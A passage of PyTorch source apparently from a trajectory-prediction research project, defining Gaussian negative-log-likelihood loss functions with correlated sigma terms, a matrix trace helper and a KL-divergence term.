# the NaN carries through anyway - the function that the system is backtracking through keeps the NaN =
# therefore leads to NaN errors on the second pass of the function - replacing the 0's before division solves this
# issue.
if (torch.min(perpnorm) < pow(10, -7)):
accuracy = np.full((perpnorm.size(0), perpnorm.size(1), perpnorm.size(2), perpnorm.size(3)),
pow(10, -7), dtype=np.float32)
accuracy = torch.from_numpy(accuracy)
if preds.is_cuda:
accuracy = accuracy.cuda()
perpnorm = torch.max(perpnorm, accuracy)
normalisedperp = perpterm.div(perpnorm.expand_as(perpterm))
# NaN can occur when perpterm is 0, this means that preds-true = (preds-true).v|| v||
# i.e. error entirely in parallel direction and no error perpendicular: so we set these terms to 0
# normalisedperp[torch.isnan(normalisedperp)] = 0
# gets the error vectors
errorvectorperptov = torch.matmul(perpterm.unsqueeze(3), normalisedperp.unsqueeze(4)).squeeze()
errorvectorparalleltov = errorvectorparalleltov.squeeze()
# errorvectorperptov = torch.matmul(velperp.unsqueeze(3), position_differences).squeeze()
errorvectorparalleltoa = torch.matmul(normalisedaccel.unsqueeze(3), velocity_differences)
parallelterm = torch.matmul(normalisedaccel.unsqueeze(4), errorvectorparalleltoa)
perpterm = (velocity_differences - parallelterm).squeeze()
perpnorm = perpterm.norm(p=2, dim=3, keepdim=True)
if (torch.min(perpnorm) < pow(10, -7)):
accuracy = np.full((perpnorm.size(0), perpnorm.size(1), perpnorm.size(2), perpnorm.size(3)),
pow(10, -7), dtype=np.float32)
accuracy = torch.from_numpy(accuracy)
if preds.is_cuda:
accuracy = accuracy.cuda()
perpnorm = torch.max(perpnorm, accuracy)
normalisedperp = perpterm.div(perpnorm.expand_as(perpterm))
# NaN when preds-target is entirely in the v parallel direction. This means the error in the perpendiular
# direction is 0
# normalisedperp[torch.isnan(normalisedperp)] = 0
errorvectorperptoa = torch.matmul(perpterm.unsqueeze(3), normalisedperp.unsqueeze(4)).squeeze()
errorvectorparalleltoa = errorvectorparalleltoa.squeeze()
# errorvectorperptoa = torch.matmul(accelperp.unsqueeze(3), velocity_differences).squeeze()
indices_vpar = torch.LongTensor([0])
indices_vperp = torch.LongTensor([1])
indices_apar = torch.LongTensor([2])
indices_aperp = torch.LongTensor([3])
#print('matrixmult: {:.1f}s'.format(time.time() - multime))
if preds.is_cuda:
indices_vpar, indices_vperp, indices_apar, indices_aperp = indices_vpar.cuda(), indices_vperp.cuda(), indices_apar.cuda(), indices_aperp.cuda()
# t = time.time()
# gets the loss components
losscomponentparalleltov = (errorvectorparalleltov ** 2) * torch.index_select(inversevariance, 3, indices_vpar).squeeze()
losscomponentperptov = (errorvectorperptov ** 2) * torch.index_select(inversevariance, 3, indices_vperp).squeeze()
losscomponentparalleltoa = (errorvectorparalleltoa ** 2) * torch.index_select(inversevariance, 3, indices_apar).squeeze()
losscomponentperptoa = (errorvectorperptoa ** 2) * torch.index_select(inversevariance, 3, indices_aperp).squeeze()
neg_log_loss = losscomponentparalleltov + losscomponentperptov + losscomponentparalleltoa + losscomponentperptoa
loss_1 = neg_log_loss
loss_2 = 0.0
# print('getlosscomponents: {:.1f}s'.format(time.time() - t))
# convexifying term is 0.1 * ||x-y||^2 according to algorithm by Edoardo Calvello. lambda is chosen as 0.1 here
convterm = 0.1 * ((preds-target) - yphasespace) ** 2 + 0.1 * (sigma - ysigmaterm) ** 2
neg_log_loss += convterm.sum(dim = 3)
if add_const:
const = (0.5 * torch.log(2*np.pi* determinant))
neg_log_loss += const.squeeze()
loss_2 += const.squeeze()
return ((neg_log_loss).sum(dim=1)/target.size(1)).var()
def nll_gaussian_var_multivariatesigma_withcorrelations(preds, target, sigma, accel, vel, eps= 1e-3, alpha = 0.05, add_const=True):
"""
Loss function for the case of variable sigma multivariate normal case with correlations between coordinates.
Implemented based on arXiv:1910.14215 [cs.LG] R.L. Russell et al findings
sigma has shape [batchsize, no.ofparticles, times, (s11,rho12,rho21,s22,s33,rho34,rho43,s44)]
:param preds: prediction values from NN of size [batch, particles, timesteps, (x,y,v_x,v_y)]
:param target: target data of size [batch, particles, timesteps, (x,y,v_x,v_y)]
:param sigma: tensor of sigma values size [batch, particles, timesteps, (x,y,v_x,v_y)]
:param accel: gives direction of acceleration of each prediction data point. Size [batch, particles, timesteps, 2]
:param vel: gives direction of velocity of each prediction data point. Size [batch, particles, timesteps, 2]
:param eps: small term to ensure Pearson correlation coefficients are not close to 1: see arXiv:1910.14215 [cs.LG] R.L. Russell et al
:param alpha: term that ensures Pearson correlation coefficients do not saturate quickly: see arXiv:1910.14215 [cs.LG] R.L. Russell et al
:param add_const: True- adds the 1/2 ln(2*pi*variance) term
:return: variance of the loss function
"""
# get normalised vectors for acceleration and velocities v|| and a||
# t = time.time()
velnorm = vel.norm(p=2, dim=3, keepdim=True)
normalisedvel = vel.div(velnorm.expand_as(vel))
# 1/sqrt(2) - isotropic when NaN => direction unimportant. chosen here to improve efficiency
normalisedvel[torch.isnan(normalisedvel)] = np.power(1 / 2, 1 / 2)
accelnorm = accel.norm(p=2, dim=3, keepdim=True)
normalisedaccel = accel.div(accelnorm.expand_as(accel))
normalisedaccel[torch.isnan(normalisedaccel)] = np.power(1 / 2, 1 / 2)
# Pearson correlation coeffns activation function to ensure they are within (-1,1) and 1-eps to ensure they are not
# close to 1 and alpha to ensure they don't saturate quickly: see arXiv:1910.14215 [cs.LG] R.L. Russell et al
indices_pos = torch.LongTensor([1, 2])
indices_vel = torch.LongTensor([5, 6])
if preds.is_cuda:
indices_pos, indices_vel = indices_pos.cuda(), indices_vel.cuda()
# extract pearson coeffns output from NN
rho_pos = torch.index_select(sigma, 3, indices_pos)
rho_vel = torch.index_select(sigma, 3, indices_vel)
# rescale pearson coeffns
rho_pos = (1 - eps) * torch.tanh(alpha * rho_pos)
rho_vel = (1 - eps) * torch.tanh(alpha * rho_vel)
# extract each of the sigma terms for position and velocity
indices_pos_1 = torch.LongTensor([0])
indices_pos_2 = torch.LongTensor([3])
indices_vel_1 = torch.LongTensor([4])
indices_vel_2 = torch.LongTensor([7])
if preds.is_cuda:
indices_pos_1, indices_pos_2, indices_vel_1, indices_vel_2 = indices_pos_1.cuda(), indices_pos_2.cuda(), indices_vel_1.cuda(), indices_vel_2.cuda()
sigma_pos_1 = torch.index_select(sigma, 3, indices_pos_1)
sigma_pos_2 = torch.index_select(sigma, 3, indices_pos_2)
sigma_vel_1 = torch.index_select(sigma, 3, indices_vel_1)
sigma_vel_2 = torch.index_select(sigma, 3, indices_vel_2)
# off diagonal terms given by rho sigma1 sigma2
sigma_term_pos = torch.sqrt((sigma_pos_1 * sigma_pos_2))
sigma_term_vel = torch.sqrt((sigma_vel_1 * sigma_vel_2))
offdiagsigma_pos = tile(sigma_term_pos, 3, rho_pos.size(3))
offdiagsigma_vel = tile(sigma_term_vel, 3, rho_vel.size(3))
sigmaoffdiag_pos = rho_pos * offdiagsigma_pos
sigmaoffdiag_vel = rho_vel * offdiagsigma_vel
# need Sigma=Sigma^2, Sigma^-2 and det(Sigma)
# ti = time.time()
# reconstruct sigma from position and velocity
indices_pos_1 = torch.LongTensor([0])
indices_pos_2 = torch.LongTensor([3])
indices_vel_1 = torch.LongTensor([4])
indices_vel_2 = torch.LongTensor([7])
if preds.is_cuda:
indices_pos_1, indices_pos_2, indices_vel_1, indices_vel_2 = indices_pos_1.cuda(), indices_pos_2.cuda(), indices_vel_1.cuda(), indices_vel_2.cuda()
sigma_pos = torch.cat((torch.cat((torch.index_select(sigma, 3, indices_pos_1), sigmaoffdiag_pos), 3),
torch.index_select(sigma, 3, indices_pos_2)), 3)
sigma_vel = torch.cat((torch.cat((torch.index_select(sigma, 3, indices_vel_1), sigmaoffdiag_vel), 3),
torch.index_select(sigma, 3, indices_vel_2)), 3)
sigma_pos = sigma_pos.reshape(sigma.size(0), sigma.size(1), sigma.size(2), 2, 2)
sigma_vel = sigma_vel.reshape(sigma.size(0), sigma.size(1), sigma.size(2), 2, 2)
# get sigma^2 for pos and vel
variance_pos = torch.matmul(sigma_pos, sigma_pos)
variance_vel = torch.matmul(sigma_vel, sigma_vel)
# reshape to desired shape for use
variance_pos = variance_pos.reshape(variance_pos.size(0), variance_pos.size(1), variance_pos.size(2), 4)
variance_vel = variance_vel.reshape(variance_vel.size(0), variance_vel.size(1), variance_vel.size(2), 4)
indices_sigma = torch.LongTensor([0, 3])
indices_diag_1 = torch.LongTensor([1, 2])
if preds.is_cuda:
indices_sigma, indices_diag_1 = indices_sigma.cuda(), indices_diag_1.cuda()
# extract variance
var_pos = torch.index_select(variance_pos, 3, indices_sigma)
var_vel = torch.index_select(variance_vel, 3, indices_sigma)
offdiag_pos = torch.index_select(variance_pos, 3, indices_diag_1)
offdiag_vel = torch.index_select(variance_vel, 3, indices_diag_1)
# ensures variance does not go to 0
if (torch.min(var_pos) < pow(10, -14)) or (torch.min(var_vel) < pow(10, -14)):
accuracy = np.full((var_pos.size(0), var_pos.size(1), var_pos.size(2), var_pos.size(3)),
pow(10, -14), dtype=np.float32)
accuracy = torch.from_numpy(accuracy)
if preds.is_cuda:
accuracy = accuracy.cuda()
var_pos = torch.max(var_pos, accuracy)
var_vel = torch.max(var_vel, accuracy)
indices_1 = torch.LongTensor([0])
indices_2 = torch.LongTensor([1])
if preds.is_cuda:
indices_1, indices_2 = indices_1.cuda(), indices_2.cuda()
# recasts the variance into desired form
variance_pos = torch.cat((torch.cat((torch.index_select(var_pos, 3, indices_1), offdiag_pos), 3),
torch.index_select(var_pos, 3, indices_2)), 3)
variance_vel = torch.cat((torch.cat((torch.index_select(var_vel, 3, indices_1), offdiag_vel), 3),
torch.index_select(var_vel, 3, indices_2)), 3)
variance_pos = variance_pos.reshape(variance_pos.size(0), variance_pos.size(1), variance_pos.size(2), 2, 2)
variance_vel = variance_vel.reshape(variance_vel.size(0), variance_vel.size(1), variance_vel.size(2), 2, 2)
# determinant of block diagonal matrix = product of submatrices determinants
determinant_pos = variance_pos.det()
determinant_vel = variance_vel.det()
determinant = determinant_vel * determinant_pos
# Matrix not invertable iff sigma1 or sigma2 == 0 or Pearson correlation coeffs are 1 (we ensure this is not the
# case above)
# of form 1/(1-rho^2) (1/sigma1^2, -rho/sigma1sigma2
# -rho/sigma1sigma2 1/sigma2^2)
inversevariance_pos = torch.inverse(variance_pos)
inversevariance_vel = torch.inverse(variance_vel)
# recasts inverse variance into desired shape
inversevariance_pos = inversevariance_pos.reshape(inversevariance_pos.size(0), inversevariance_pos.size(1),
inversevariance_pos.size(2), 4)
inversevariance_vel = inversevariance_vel.reshape(inversevariance_vel.size(0), inversevariance_vel.size(1),
inversevariance_vel.size(2), 4)
# if np.isnan(np.sum(inversevariance.cpu().detach().numpy())):
# print("Some values from variance are nan")
# need position and velocity differences in (x,y) coordinates
differences = preds - target
indices_pos = torch.LongTensor([0, 1])
indices_vel = torch.LongTensor([2, 3])
if preds.is_cuda:
indices_pos, indices_vel = indices_pos.cuda(), indices_vel.cuda()
position_differences = torch.index_select(differences, 3, indices_pos)
velocity_differences = torch.index_select(differences, 3, indices_vel)
position_differences = position_differences.unsqueeze(4)
velocity_differences = velocity_differences.unsqueeze(4) # (x-mu)
# print('getdifferences: {:.1f}s'.format(time.time() - ti))
# the matrix multiplication for multivariate case can be thought of as taking a projection of the error vector
# along the parallel and perpendicular velocity/acceleration directions and multiplying by 1/sigma^2 along that
# direction. This follows directly from the fact the rotation matrix is orthogonal.
# multime = time.time()
# surprisingly it is more efficient to calculate the perpendicular term by considering
# (position_differences - (position_differences.v||)v||).vperp to get the position differences in the perpendicular
# direction than using rotation (x,y) -> (-y,x) as the triple for loop is inefficient. about 100x faster this way
# and almost as fast as isotropic
errorvectorparalleltov = torch.matmul(normalisedvel.unsqueeze(3), position_differences)
parallelterm = torch.matmul(normalisedvel.unsqueeze(4), errorvectorparalleltov)
perpterm = (position_differences - parallelterm).squeeze()
perpnorm = perpterm.norm(p=2, dim=3, keepdim=True)
# NaN can occur when dividing by 0 (see comment below) but the problem with replacing NaN after the division is that
# the NaN carries through anyway - the function that the system is backtracking through keeps the NaN =
# therefore leads to NaN errors on the second pass of the function - replacing the 0's before division solves this
# issue.
if (torch.min(perpnorm) < pow(10, -7)):
accuracy = np.full((perpnorm.size(0), perpnorm.size(1), perpnorm.size(2), perpnorm.size(3)),
pow(10, -7), dtype=np.float32)
accuracy = torch.from_numpy(accuracy)
if preds.is_cuda:
accuracy = accuracy.cuda()
perpnorm = torch.max(perpnorm, accuracy)
normalisedperp = perpterm.div(perpnorm.expand_as(perpterm))
# NaN can occur when perpterm is 0, this means that preds-true = (preds-true).v|| v||
# i.e. error entirely in parallel direction and no error perpendicular: so we set these terms to 0
# normalisedperp[torch.isnan(normalisedperp)] = 0
errorvectorperptov = torch.matmul(perpterm.unsqueeze(3), normalisedperp.unsqueeze(4)).squeeze()
errorvectorparalleltov = errorvectorparalleltov.squeeze()
# errorvectorperptov = torch.matmul(velperp.unsqueeze(3), position_differences).squeeze()
errorvectorparalleltoa = torch.matmul(normalisedaccel.unsqueeze(3), velocity_differences)
parallelterm = torch.matmul(normalisedaccel.unsqueeze(4), errorvectorparalleltoa)
perpterm = (velocity_differences - parallelterm).squeeze()
perpnorm = perpterm.norm(p=2, dim=3, keepdim=True)
if (torch.min(perpnorm) < pow(10, -7)):
accuracy = np.full((perpnorm.size(0), perpnorm.size(1), perpnorm.size(2), perpnorm.size(3)),
pow(10, -7), dtype=np.float32)
accuracy = torch.from_numpy(accuracy)
if preds.is_cuda:
accuracy = accuracy.cuda()
perpnorm = torch.max(perpnorm, accuracy)
normalisedperp = perpterm.div(perpnorm.expand_as(perpterm))
# NaN when preds-target is entirely in the v parallel direction. This means the error in the perpendiular
# direction is 0
# normalisedperp[torch.isnan(normalisedperp)] = 0
errorvectorperptoa = torch.matmul(perpterm.unsqueeze(3), normalisedperp.unsqueeze(4)).squeeze()
errorvectorparalleltoa = errorvectorparalleltoa.squeeze()
# errorvectorperptoa = torch.matmul(accelperp.unsqueeze(3), velocity_differences).squeeze()
indices_par = torch.LongTensor([0])
indices_perp = torch.LongTensor([3])
indices_rho12 = torch.LongTensor([1])
indices_rho21 = torch.LongTensor([2])
# print('matrixmult: {:.1f}s'.format(time.time() - multime))
if preds.is_cuda:
indices_par, indices_perp, indices_rho12, indices_rho21 = indices_par.cuda(), indices_perp.cuda(), indices_rho12.cuda(), indices_rho21.cuda()
# t = time.time()
losscomponentparalleltov = (errorvectorparalleltov ** 2) * torch.index_select(inversevariance_pos, 3,
indices_par).squeeze()
losscomponentperptov = (errorvectorperptov ** 2) * torch.index_select(inversevariance_pos, 3,
indices_perp).squeeze()
losscomponentparalleltoa = (errorvectorparalleltoa ** 2) * torch.index_select(inversevariance_vel, 3,
indices_par).squeeze()
losscomponentperptoa = (errorvectorperptoa ** 2) * torch.index_select(inversevariance_vel, 3,
indices_perp).squeeze()
losscomponentoffdiagv = (errorvectorperptov * errorvectorparalleltov) * (
torch.index_select(inversevariance_pos, 3, indices_rho12) + torch.index_select(inversevariance_pos, 3,
indices_rho21)).squeeze()
losscomponentoffdiaga = (errorvectorperptoa * errorvectorparalleltoa) * (
torch.index_select(inversevariance_vel, 3, indices_rho12) + torch.index_select(inversevariance_vel, 3,
indices_rho21)).squeeze()
neg_log_loss = losscomponentparalleltov + losscomponentperptov + losscomponentparalleltoa + losscomponentperptoa + losscomponentoffdiagv + losscomponentoffdiaga
loss_1 = neg_log_loss
loss_2 = 0.0
# print('getlosscomponents: {:.1f}s'.format(time.time() - t))
if add_const:
const = (0.5 * torch.log(2 * np.pi * determinant))
neg_log_loss += const.squeeze()
loss_2 += const.squeeze()
return ((neg_log_loss).sum(dim=1)/target.size(1)).var()
def nll_gaussian_multivariatesigma_withcorrelations(preds, target, sigma, accel, vel, eps= 1e-3, alpha = 0.2, add_const=True):
"""
Loss function for the case of variable sigma multivariate normal case with correlations between coordinates.
Implemented based on arXiv:1910.14215 [cs.LG] R.L. Russell et al findings
sigma has shape [batchsize, no.ofparticles, times, (s11,rho12,rho21,s22,s33,rho34,rho43,s44)]
:param preds: prediction values from NN of size [batch, particles, timesteps, (x,y,v_x,v_y)]
:param target: target data of size [batch, particles, timesteps, (x,y,v_x,v_y)]
:param sigma: tensor of sigma values size [batch, particles, timesteps, (x,y,v_x,v_y)]
:param accel: gives direction of acceleration of each prediction data point. Size [batch, particles, timesteps, 2]
:param vel: gives direction of velocity of each prediction data point. Size [batch, particles, timesteps, 2]
:param eps: small term to ensure Pearson correlation coefficients are not close to 1: see arXiv:1910.14215 [cs.LG] R.L. Russell et al
:param alpha: term that ensures Pearson correlation coefficients do not saturate quickly: see arXiv:1910.14215 [cs.LG] R.L. Russell et al
:param add_const: True- adds the 1/2 ln(2*pi*variance) term
:return: value of the loss function normalised by (batch * number of atoms), value for loss of each term
"""
# get normalised vectors for acceleration and velocities v|| and a||
# t = time.time()
velnorm = vel.norm(p=2, dim=3, keepdim=True)
normalisedvel = vel.div(velnorm.expand_as(vel))
# 1/sqrt(2) - isotropic when NaN => direction unimportant. chosen here to improve efficiency
normalisedvel[torch.isnan(normalisedvel)] = np.power(1 / 2, 1 / 2)
accelnorm = accel.norm(p=2, dim=3, keepdim=True)
normalisedaccel = accel.div(accelnorm.expand_as(accel))
normalisedaccel[torch.isnan(normalisedaccel)] = np.power(1 / 2, 1 / 2)
# Pearson correlation coeffns activation function to ensure they are within (-1,1) and 1-eps to ensure they are not
# close to 1 and alpha to ensure they don't saturate quickly: see arXiv:1910.14215 [cs.LG] R.L. Russell et al
indices_pos = torch.LongTensor([1, 2])
indices_vel = torch.LongTensor([5, 6])
if preds.is_cuda:
indices_pos, indices_vel = indices_pos.cuda(), indices_vel.cuda()
# extract pearson coeffns output from NN
rho_pos = torch.index_select(sigma, 3, indices_pos)
rho_vel = torch.index_select(sigma, 3, indices_vel)
# rescale pearson coeffns
rho_pos = (1 - eps) * torch.tanh(alpha * rho_pos)
rho_vel = (1 - eps) * torch.tanh(alpha * rho_vel)
# extract each of the sigma terms for position and velocity
indices_pos_1 = torch.LongTensor([0])
indices_pos_2 = torch.LongTensor([3])
indices_vel_1 = torch.LongTensor([4])
indices_vel_2 = torch.LongTensor([7])
if preds.is_cuda:
indices_pos_1, indices_pos_2, indices_vel_1, indices_vel_2 = indices_pos_1.cuda(), indices_pos_2.cuda(), indices_vel_1.cuda(), indices_vel_2.cuda()
sigma_pos_1 = torch.index_select(sigma, 3, indices_pos_1)
sigma_pos_2 = torch.index_select(sigma, 3, indices_pos_2)
sigma_vel_1 = torch.index_select(sigma, 3, indices_vel_1)
sigma_vel_2 = torch.index_select(sigma, 3, indices_vel_2)
# off diagonal terms given by rho sigma1 sigma2
sigma_term_pos = torch.sqrt((sigma_pos_1 * sigma_pos_2))
sigma_term_vel = torch.sqrt((sigma_vel_1 * sigma_vel_2))
offdiagsigma_pos = tile(sigma_term_pos, 3, rho_pos.size(3))
offdiagsigma_vel = tile(sigma_term_vel, 3, rho_vel.size(3))
sigmaoffdiag_pos = rho_pos * offdiagsigma_pos
sigmaoffdiag_vel = rho_vel * offdiagsigma_vel
# need Sigma=Sigma^2, Sigma^-2 and det(Sigma)
# ti = time.time()
# reconstruct sigma from position and velocity
indices_pos_1 = torch.LongTensor([0])
indices_pos_2 = torch.LongTensor([3])
indices_vel_1 = torch.LongTensor([4])
indices_vel_2 = torch.LongTensor([7])
if preds.is_cuda:
indices_pos_1, indices_pos_2, indices_vel_1, indices_vel_2 = indices_pos_1.cuda(), indices_pos_2.cuda(), indices_vel_1.cuda(), indices_vel_2.cuda()
sigma_pos = torch.cat((torch.cat((torch.index_select(sigma, 3, indices_pos_1), sigmaoffdiag_pos), 3),
torch.index_select(sigma, 3, indices_pos_2)), 3)
sigma_vel = torch.cat((torch.cat((torch.index_select(sigma, 3, indices_vel_1), sigmaoffdiag_vel), 3),
torch.index_select(sigma, 3, indices_vel_2)), 3)
sigma_pos = sigma_pos.reshape(sigma.size(0), sigma.size(1), sigma.size(2), 2, 2)
sigma_vel = sigma_vel.reshape(sigma.size(0), sigma.size(1), sigma.size(2), 2, 2)
# get sigma^2 for pos and vel
variance_pos = torch.matmul(sigma_pos, sigma_pos)
variance_vel = torch.matmul(sigma_vel, sigma_vel)
# reshape to desired shape for use
variance_pos = variance_pos.reshape(variance_pos.size(0), variance_pos.size(1), variance_pos.size(2), 4)
variance_vel = variance_vel.reshape(variance_vel.size(0), variance_vel.size(1), variance_vel.size(2), 4)
indices_sigma = torch.LongTensor([0, 3])
indices_diag_1 = torch.LongTensor([1, 2])
if preds.is_cuda:
indices_sigma, indices_diag_1 = indices_sigma.cuda(), indices_diag_1.cuda()
# extract variance
var_pos = torch.index_select(variance_pos, 3, indices_sigma)
var_vel = torch.index_select(variance_vel, 3, indices_sigma)
offdiag_pos = torch.index_select(variance_pos, 3, indices_diag_1)
offdiag_vel = torch.index_select(variance_vel, 3, indices_diag_1)
# ensures variance does not go to 0
if (torch.min(var_pos) < pow(10, -14)) or (torch.min(var_vel) < pow(10, -14)):
accuracy = np.full((var_pos.size(0), var_pos.size(1), var_pos.size(2), var_pos.size(3)),
pow(10, -14), dtype=np.float32)
accuracy = torch.from_numpy(accuracy)
if preds.is_cuda:
accuracy = accuracy.cuda()
var_pos = torch.max(var_pos, accuracy)
var_vel = torch.max(var_vel, accuracy)
indices_1 = torch.LongTensor([0])
indices_2 = torch.LongTensor([1])
if preds.is_cuda:
indices_1, indices_2 = indices_1.cuda(), indices_2.cuda()
# recasts the variance into desired form
variance_pos = torch.cat((torch.cat((torch.index_select(var_pos, 3, indices_1), offdiag_pos), 3),
torch.index_select(var_pos, 3, indices_2)), 3)
variance_vel = torch.cat((torch.cat((torch.index_select(var_vel, 3, indices_1), offdiag_vel), 3),
torch.index_select(var_vel, 3, indices_2)), 3)
variance_pos = variance_pos.reshape(variance_pos.size(0), variance_pos.size(1), variance_pos.size(2), 2, 2)
variance_vel = variance_vel.reshape(variance_vel.size(0), variance_vel.size(1), variance_vel.size(2), 2, 2)
# determinant of block diagonal matrix = product of submatrices determinants
determinant_pos = variance_pos.det()
determinant_vel = variance_vel.det()
determinant = determinant_vel * determinant_pos
# Matrix not invertable iff sigma1 or sigma2 == 0 or Pearson correlation coeffs are 1 (we ensure this is not the
# case above)
# of form 1/(1-rho^2) (1/sigma1^2, -rho/sigma1sigma2
# -rho/sigma1sigma2 1/sigma2^2)
inversevariance_pos = torch.inverse(variance_pos)
inversevariance_vel = torch.inverse(variance_vel)
inversevariance_pos = inversevariance_pos.reshape(inversevariance_pos.size(0), inversevariance_pos.size(1), inversevariance_pos.size(2), 4)
inversevariance_vel = inversevariance_vel.reshape(inversevariance_vel.size(0), inversevariance_vel.size(1),
inversevariance_vel.size(2), 4)
# if np.isnan(np.sum(inversevariance.cpu().detach().numpy())):
# print("Some values from variance are nan")
# need position and velocity differences in (x,y) coordinates
differences = preds-target
indices_pos = torch.LongTensor([0,1])
indices_vel = torch.LongTensor([2,3])
if preds.is_cuda:
indices_pos, indices_vel = indices_pos.cuda(), indices_vel.cuda()
position_differences = torch.index_select(differences, 3, indices_pos)
velocity_differences = torch.index_select(differences, 3, indices_vel)
position_differences = position_differences.unsqueeze(4)
velocity_differences = velocity_differences.unsqueeze(4)# (x-mu)
# print('getdifferences: {:.1f}s'.format(time.time() - ti))
# the matrix multiplication for multivariate case can be thought of as taking a projection of the error vector
# along the parallel and perpendicular velocity/acceleration directions and multiplying by 1/sigma^2 along that
# direction. This follows directly from the fact the rotation matrix is orthogonal.
# multime = time.time()
# surprisingly it is more efficient to calculate the perpendicular term by considering
# (position_differences - (position_differences.v||)v||).vperp to get the position differences in the perpendicular
# direction than using rotation (x,y) -> (-y,x) as the triple for loop is inefficient. about 100x faster this way
# and almost as fast as isotropic
errorvectorparalleltov = torch.matmul(normalisedvel.unsqueeze(3), position_differences)
parallelterm = torch.matmul(normalisedvel.unsqueeze(4), errorvectorparalleltov)
perpterm = (position_differences - parallelterm).squeeze()
perpnorm = perpterm.norm(p=2, dim = 3, keepdim = True)
# NaN can occur when dividing by 0 (see comment below) but the problem with replacing NaN after the division is that
# the NaN carries through anyway - the function that the system is backtracking through keeps the NaN =
# therefore leads to NaN errors on the second pass of the function - replacing the 0's before division solves this
# issue.
if (torch.min(perpnorm) < pow(10, -7)):
accuracy = np.full((perpnorm.size(0), perpnorm.size(1), perpnorm.size(2), perpnorm.size(3)),
pow(10, -7), dtype=np.float32)
accuracy = torch.from_numpy(accuracy)
if preds.is_cuda:
accuracy = accuracy.cuda()
perpnorm = torch.max(perpnorm, accuracy)
normalisedperp = perpterm.div(perpnorm.expand_as(perpterm))
# NaN can occur when perpterm is 0, this means that preds-true = (preds-true).v|| v||
# i.e. error entirely in parallel direction and no error perpendicular: so we set these terms to 0
# normalisedperp[torch.isnan(normalisedperp)] = 0
errorvectorperptov = torch.matmul(perpterm.unsqueeze(3), normalisedperp.unsqueeze(4)).squeeze()
errorvectorparalleltov = errorvectorparalleltov.squeeze()
# errorvectorperptov = torch.matmul(velperp.unsqueeze(3), position_differences).squeeze()
errorvectorparalleltoa = torch.matmul(normalisedaccel.unsqueeze(3), velocity_differences)
parallelterm = torch.matmul(normalisedaccel.unsqueeze(4), errorvectorparalleltoa)
perpterm = (velocity_differences - parallelterm).squeeze()
perpnorm = perpterm.norm(p=2, dim=3, keepdim=True)
if (torch.min(perpnorm) < pow(10, -7)):
accuracy = np.full((perpnorm.size(0), perpnorm.size(1), perpnorm.size(2), perpnorm.size(3)),
pow(10, -7), dtype=np.float32)
accuracy = torch.from_numpy(accuracy)
if preds.is_cuda:
accuracy = accuracy.cuda()
perpnorm = torch.max(perpnorm, accuracy)
normalisedperp = perpterm.div(perpnorm.expand_as(perpterm))
# NaN when preds-target is entirely in the v parallel direction. This means the error in the perpendiular
# direction is 0
# normalisedperp[torch.isnan(normalisedperp)] = 0
errorvectorperptoa = torch.matmul(perpterm.unsqueeze(3), normalisedperp.unsqueeze(4)).squeeze()
errorvectorparalleltoa = errorvectorparalleltoa.squeeze()
# errorvectorperptoa = torch.matmul(accelperp.unsqueeze(3), velocity_differences).squeeze()
indices_par = torch.LongTensor([0])
indices_perp = torch.LongTensor([3])
indices_rho12 = torch.LongTensor([1])
indices_rho21 = torch.LongTensor([2])
#print('matrixmult: {:.1f}s'.format(time.time() - multime))
if preds.is_cuda:
indices_par, indices_perp, indices_rho12, indices_rho21 = indices_par.cuda(), indices_perp.cuda(), indices_rho12.cuda(), indices_rho21.cuda()
# t = time.time()
losscomponentparalleltov = (errorvectorparalleltov ** 2) * torch.index_select(inversevariance_pos, 3, indices_par).squeeze()
losscomponentperptov = (errorvectorperptov ** 2) * torch.index_select(inversevariance_pos, 3, indices_perp).squeeze()
losscomponentparalleltoa = (errorvectorparalleltoa ** 2) * torch.index_select(inversevariance_vel, 3, indices_par).squeeze()
losscomponentperptoa = (errorvectorperptoa ** 2) * torch.index_select(inversevariance_vel, 3, indices_perp).squeeze()
losscomponentoffdiagv = (errorvectorperptov *errorvectorparalleltov) * (torch.index_select(inversevariance_pos, 3, indices_rho12) + torch.index_select(inversevariance_pos, 3, indices_rho21)).squeeze()
losscomponentoffdiaga = (errorvectorperptoa *errorvectorparalleltoa) * (torch.index_select(inversevariance_vel, 3, indices_rho12) + torch.index_select(inversevariance_vel, 3, indices_rho21)).squeeze()
neg_log_loss = losscomponentparalleltov + losscomponentperptov + losscomponentparalleltoa + losscomponentperptoa+ losscomponentoffdiagv + losscomponentoffdiaga
loss_1 = neg_log_loss
loss_2 = 0.0
# print('getlosscomponents: {:.1f}s'.format(time.time() - t))
if add_const:
const = (0.5 * torch.log(2*np.pi* determinant))
neg_log_loss += const.squeeze()
loss_2 += const.squeeze()
return (neg_log_loss).sum() / (target.size(0) * target.size(1)), loss_1.sum() / (target.size(0) * target.size(1)) , loss_2 / (target.size(0) * target.size(1)) # normalisation here is (batch * num atoms)
def true_flip(x, dim):
indices = [slice(None)] * x.dim()
indices[dim] = torch.arange(x.size(dim) - 1, -1, -1,
dtype=torch.long, device=x.device)
return x[tuple(indices)]
def trace(A):
"""
taken from https://github.com/pytorch/pytorch/issues/7500
Takes the trace of the matrix
:param A: Tensor of at least dimension [1,1]. Takes trace of last two dimensions
"""
return A.diagonal(dim1=-2, dim2=-1).sum(-1)
def KL_output_multivariate(output, sigma, target, sigma_target, eps=1e-20):
"""
KL term for the multivariate Gaussian distribution. Trying to compare the output distribution to a prior Gaussian
distribution.
:param output: prediction values from NN of size [batch, particles, timesteps, (x,y,v_x,v_y)]
:param sigma: tensor of sigma values from NN of size [batch, particles, timesteps, (x,y,v_x,v_y)]
:param target: target data of size [batch, particles, timesteps, (x,y,v_x,v_y)]
:param sigma_target: tensor of sigma values from the prior of size [batch, particles, timesteps, (x,y,v_x,v_y)]
:param eps: small term to ensure that the logarithm doesn't become 0
:return: KL term normalised by batch size and no. of particles.
"""
# variance and target variance
variance = sigma ** 2
variance_target = sigma_target[:,:,:sigma.size(2),:] ** 2
# ensures the inverse will not yield NaN
if (torch.min(variance_target) < pow(10, -10)):
accuracy = np.full((variance_target.size(0), variance_target.size(1), variance_target.size(2), variance_target.size(3)),
pow(10, -10), dtype=np.float32)
accuracy = torch.from_numpy(accuracy)
if output.is_cuda:
accuracy = accuracy.cuda()
variance_target = torch.max(variance_target, accuracy)
inversevariance_target = variance_target ** -1
trace_term = torch.sum(inversevariance_target * variance, dim = 3)
errorvect = (target[:,:,:,:] - output[:,:,:,:]) ** 2
error_term = errorvect * inversevariance_target
determinant_variance = torch.prod(variance, dim =3)
determinant_variance_target = torch.prod(variance_target, dim =3)
logterm = torch.log((determinant_variance_target+eps)/(determinant_variance+eps))
# add all 3 contributions
